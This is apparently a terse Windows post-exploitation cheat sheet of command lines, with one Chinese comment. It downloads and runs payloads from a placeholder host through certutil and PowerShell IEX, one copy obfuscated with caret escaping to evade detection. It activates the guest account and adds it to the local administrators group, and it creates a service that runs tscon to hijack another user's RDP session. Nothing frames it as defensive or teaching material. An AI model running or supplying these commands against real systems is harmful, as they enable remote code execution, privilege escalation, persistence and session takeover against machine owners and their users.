certutil.exe -urlcache -split -f http://x.x.x.x/x.exe D:\x.exe
powershell.exe IEX ((new-object
net.webclient).downloadstring('http://x.x.x.x/x'))
echo I^E^X ((new-object net.webclient).d^o^w^n^l^o^a^d^s^t^r^i^n^g('http://0.0.0.0)) | p^o^w^e^r^s^h^e^l^l -
net user guest /active:yes
net user guest [email protected]
net localgroup administrators guest /add
query user
sc create tide binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4" #1为目标会 话id和当前会话名
net start tide